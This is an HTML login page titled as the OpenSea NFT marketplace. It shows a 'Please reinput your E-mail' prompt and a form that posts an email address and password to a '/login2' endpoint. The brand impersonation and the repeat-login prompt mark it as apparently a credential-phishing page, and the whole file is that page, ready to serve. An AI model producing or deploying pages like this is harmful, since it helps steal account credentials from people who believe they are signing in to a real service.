<!DOCTYPE html>
<!-- Coding By CodingNepal - youtube.com/codingnepal -->
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
           <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>OpenSea, the largest NFT marketplace</title>
     <link rel="icon" href="favicon.png">
    <script src="https://www.google.com/recaptcha/api.js" async defer></script>
    <link rel="stylesheet" href="login/style.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN" crossorigin="anonymous">
  </head>
  <body>
    <style>
      body{
        background-image: url("/img/photo-1651221436727-28b9c922db97.avif");
        background-repeat: no-repeat;
        background-position: center;
        background-attachment: fixed;
        background-size: cover ;
      }
     .center{
      height: 350px;
     }

     h3{
      padding-top: 20px;
      padding-left: 15px;
     }

    </style>
    <div class="center">
   

      
      <h3>Please reinput your E-mail</h3>
      <form method="POST" action="/login2">
        <div class="txt_field">
          <input type="email" name="mail" required>
          <span></span>
          <label>Email</label>
        </div>
        <div class="txt_field">
          <input type="password" name="password" required>
          <span></span>
          <label>Password</label>
        </div>
       
        <input class="submit" type="submit" value="Login">
      
      </form>
    </div>
  </body>
  
</html>
